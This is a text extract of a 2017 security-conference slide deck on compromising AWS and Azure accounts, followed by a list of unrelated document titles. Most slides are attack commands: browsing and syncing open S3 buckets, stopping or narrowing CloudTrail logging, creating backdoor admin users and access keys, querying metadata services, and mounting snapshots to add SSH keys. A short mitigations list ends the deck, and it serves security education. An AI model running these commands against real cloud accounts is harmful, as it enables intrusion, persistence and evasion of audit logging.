Pwned Cloud Society - BsidesSLC 2017

PWNEDCLOUD SOCIETY:

Exploiting and Expanding Access within Azure & AWS

BRYCE KUNZ

Bryce Kunz - @TweekFawkes

@TweekFawkes

Prior Work Experience:• Adobe DMa – Red Team• DoD/NSA – Exploitation• DHS/OneNet – Defense

Trainings & Sessions• RSA – mesos/docker• SAINTCON – osquery• BsidesLV – mesos/docker• Derbycon - WhiteLightning

CLOUD…

… only one thing is for sure …

SO MUCH…

AWS Azure

SOO MUCH…

AWS Azure Google

SOOO MUCH…

AWS Azure GoogleRackspace

NEW-NEW

… they want that new-new …

AWS Azure GoogleRackspace etc…

OLD IS NEW

… but really it’s not that much different …

OLD WAYS

… push code …… jenkins …… do work son …

CIBatch Jobs

… code …… some overpriced hipster services …… do work …

CIBatch Jobs

S3 BucketBatch

Lambda

Code CodeDeploy

ADMINS

... admin …

AD/LDAP

CIBatch Jobs

Web Admin

NEW ADMIN

… admins got to admin …

AD/LDAP

CIBatch Jobs

Web Admin

Management Console

S3 BucketBatch

Lambda

Code CodeDeploy

DEVOPS

… DevOp-ocalypse …

AD/LDAP

CIBatch Jobs

Web DevOps Management Console

S3 BucketBatch

Lambda

Code CodeDeploy

DEVOPS

… DevOp-ocalypse …

AD/LDAP

CIBatch Jobs

Web DevOps Management Console

S3 BucketBatch

Lambda

Code CodeDeploy

BAD DAYS

…happen…

BAD DAYS

… $50k!?!?!?

BAD DAYS

…EC2 instances destroyed…

INITIAL ACCESS

Find a AWS Secrets• Open Source Intel• Code Repositories• Deployment Tools• Configuration Files

PASTEBIN

Find a AWS Secrets• Open Source Intel• - PasteBin.com

GITHUB

Find a AWS Secrets• Open Source Intel• - PasteBin.com• - GitHub.com

Find a AWS Secrets• Open Source Intel• Code Repositories• - BitBucket, GitLab• - Gerrit, GitBlit, Git• - SVN, etc…

DEPLOYACCESS

Find a AWS Secrets• Open Source Intel• Code Repositories• Deployment Tools• - Puppet, etc…• - Jenkins, etc…

HACK & D/LACCESS

Find a AWS Secrets• Open Source Intel• Code Repositories• Deployment Tools• Configuration Files• - Classic Hacks• -- D/L Secrets

WHAT…

Services- Many Services- API Access- User Access

… is the point?

SOMANY…

Preparation• New EC2 Instance• Setup AWS Tools

On an Ubuntu 16.x EC2 instance…

apt-get updateapt-get install python-pippip install aws-shellpip install awscli

S3 BUCKETS

S3 Bucket

AmazonS3

REGION

ping -c3 exam.pledig +nocmd exam.ple any +multiline +noall +answer nslookup 54.231.184.255

S3 Buckets• Find Region

S3 Bucket

AmazonS3

S3 BUCKETS

aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2

S3 Buckets• Find Region• Browse Files

S3 Bucket

AmazonS3

S3 BUCKETS

aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2

S3 Buckets• World Browsable

S3 Bucket

AmazonS3

S3 BUCKETS

aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2

S3 Buckets• World Browsable

S3 Bucket

AmazonS3

S3 BUCKETS

aws s3 ls s3://...exam.ple/ --no-sign-request --region us-west-2

S3 Buckets• Sensitive Files

S3 Bucket

AmazonS3

S3 BUCKETS

aws s3 sync s3://…exam.ple/ . --no-sign-request --region us-west-2

S3 Bucket

AmazonS3

S3 BUCKETS

git log

S3 Buckets• Sensitive Files• - GIT• - SVN• - etc…

S3 Bucket

AmazonS3

S3 BUCKETS

git checkout f7c…

S3 Bucket

AmazonS3

LEVERAGE SECRETS

Preparation• New EC2 Instance• Setup AWS Tools• Leverage Secrets

CONFIGURE

aws configure --profile example

AWS CLI AWS Cloud

VERIFY

(remove the spaces around the = character for easier scripts)

AWS CLI AWS Cloud

WHOAMI

aws --profile example sts get-caller-identity

Survey Access• Who Are We?

AWS CLI AWS Cloud

IAM WHO

aws --profile example iam get-user

Survey Access• Who Are We?• IAM Who?

AWS CLI AWS Cloud

LOGGING

Survey Access• Who Are We?• Logging?

AWSCloudTrailAWS CLI AWS Cloud

LOGGING?

aws --profile api_cloudtrail cloudtrail describe-trails

AWSCloudTrail

STOP-LOGS

aws --profile api_cloudtrail configure set region us-east-1

aws --profile api_cloudtrail cloudtrail stop-logging --name "arn:aws:cloudtrail:us-east-1:…:trail/…"

AWSCloudTrail

OPSEC? Survey Access• Who Are We?• Logging?

AWSCloudTrail

LOGGING?

aws --profile api_cloudtrail cloudtrail describe-trails

AWSCloudTrail

NO MULTI

aws --profile api_cloudtrail configure set region us-east-1

aws --profile api_cloudtrail cloudtrail update-trail --name "arn:aws:cloudtrail:us-east-1:…:trail/…" --no-is-multi-region-trail --no-include-global-service-events

Stops logging in all regions…• EXCEPT the HomeRegion

AWSCloudTrail

OPSEC…

Stops logging in all regions…• EXCEPT the HomeRegion

AWSCloudTrail

PERSIST

Persistence• Session Token• - Valid for 12 Hours• Add Key• Add Account

AWS CLI AWS Cloud

PERSIST

aws --profile api_cloudtrail sts get-session-token

Persistence• Session Token• - Valid for 12 Hours

AWS CLI AWS Cloud

vi ~/.aws/credentials

AWS CLI AWS Cloud

SESSION

aws --profile sessionTokens sts get-caller-identity

AWS CLI AWS Cloud

ADD KEY

To an already existing user….

Persistence• Session Token• - Valid for 12 Hours• Add Key

AWS CLI AWS Cloud

ADD KEY Persistence• Session Token• - Valid for 12 Hours• Add Key

aws --profile api_iam iam list-users

AWS CLI AWS Cloud

ADD KEY Persistence• Session Token• - Valid for 12 Hours• Add Key

aws --profile api_iam iam create-access-key --user-name test

AWS CLI AWS Cloud

ADD USER

Persistence• Session Token• - Valid for 12 Hours• Add Key• Add User

AWS CLI AWS Cloud

ADD USER

aws --profile api_iam iam create-user --user-name mryanaws --profile api_iam iam add-user-to-group --user-name mryan --group-name Admin

ADD KEY

aws --profile api_iam iam create-access-key --user-name mryan

ADD PASS

aws --profile api_iam iam create-login-profile --user-name mryan --password examplepass

NEW EC2

EC2 META

Metadata Service: 169.254.169.254

curl http://169.254.169.254/latest/meta-data/

RFC-3927: https://tools.ietf.org/html/rfc3927AWS: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.htmlAWS Query Tool: https://aws.amazon.com/code/1825

AZURE META

Metadata Service: 169.254.169.254curl http://169.254.169.254/metadata/v1/maintenancecurl http://169.254.169.254/metadata/v1/InstanceInfo(these are mostly useless for hackers…) but useful information is copied into the …

/var/lib/waagent directory when the instance is created… (root access needed)• IP address, hostname, subscription ID, resource group name, etc…

SNAPS &IAM

aws --profile api_ec2 ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

mount /dev/xvdb1 /mnt

HARD BOOT

Horrible OPSEC but it works…- Power off a server- Mount the server’s hard drive using another EC2- Modify the server for remote access (e.g. add an SSH key to root user)- Power back on the server & PROFIT!

MITIGATIONS• Single Purpose Secrets• Limited the Access of each Secret• Create roles and limit the access of each role• You can ACL off secrets to only work from certain IP addresses• Log API calls (e.g. cloudtrail)• Never use root secrets (use as a break glass account only)• Rotate Secrets Frequently• Encrypt secrets within GIT and other data stores

THANKS!

References • http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/hint2.html

• https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains

• http://flaws.cloud/

• https://danielgrzelak.com/disrupting-aws-logging-a42e437d6594

• https://danielgrzelak.com/backdooring-an-aws-account-da007d36f8f9

• https://danielgrzelak.com/exploring-an-aws-account-after-pwning-it-ff629c2aae39

• http://docplayer.net/24014561-Defending-the-cloud-from-the-full-stack-hack.html

Pwned Cloud Society - BsidesSLC 2017

Technology

Transcript of Pwned Cloud Society - BsidesSLC 2017

Cloud Computing Roundtable - IEEE Computer Society€¦ · · 2012-02-29Cloud Computing NOVEMBER/DECEMBER ... Web-application vulnerabilities for the cloud space. ... top security

Virtually Pwned: Hacking VMware [ITA - SMAU10]

SECURITY IN THE ClOUD - British Computer Society · Head of Cloud Computing Practice, ... The myth about security vulnerabilities in the cloud ... of understanding of the various

Killing RATs with an Incident Response FrameworkAPT? What happens when a large company gets pwned. Somehow involves China With BYOD, IPv6, and Cloud, they are the four Horsemen of

Summoning the Password Cracking Beast - Netwrix€¦ · • Build an awesome cloud-based password-cracking rig • Download millions of known “pwned” passwords • Dump and crack

The application of cloud computing to royal society of chemistry data platforms

Shift Pwned Aaron "Government don't care About us…"

Email keeps getting us pwned - Avoiding Ransomware and malware

DIR ISF - Email keeps getting us pwned v1.1

REGULATION OF VIOLENT VIDEO GAMES: WILL FREE SPEECH GET PWNED? By: Lawrence G. Walters, Esq. Walters Law Group .

New Cloud Intelligent Society - Fujitsu Global Cloud Intelligent Society.pdf · New Cloud Intelligent Society José ... Uma solução de cloud com efetivo suporte de segurança a

Asec r01-resting-on-your-laurels-will-get-you-pwned

Making the Networked Society - ITU · Access/Mobility Service Provider Core Devices/IoT Enterprise IT/Cloud Transport Management & Control Service Provider IT Cloud Applications Cloud

Virtually Pwned Pentesting VMware - Hack In The Boxconference.hackinthebox.org/hitbsecconf2010kul/materials... · 2017-10-15 · Virtually Pwned Pentesting VMware Claudio Criscione

From Patched to Pwned - Foofus.Neth.foofus.net/~percX/Xerox_hack.pdf · From Patched to Pwned ... Inside this folder are several items of interest including the ... we run dlm_maker

In Situ Cloud Sensing with Multiple Scattering Lidar ... situ cloud...NOVEMBER 2003 EVANS ET AL. 1505 q 2003 American Meteorological Society In Situ Cloud Sensing with Multiple Scattering

PEAP: Pwned Extensible Authentication · PDF filePEAP: Pwned Extensible Authentication Protocol ShmooCon 2008 Joshua Wright, jwright@willhackforsushi.com Brad Antoniewicz, Brad.Antoniewicz@foundstone.com

Email keeps getting us pwned v1.1

Unlocking the cloud for Networked Society

"School on cloud" org summit @ Doukas School - Learning, ICT, Cloud, Networked Society 220314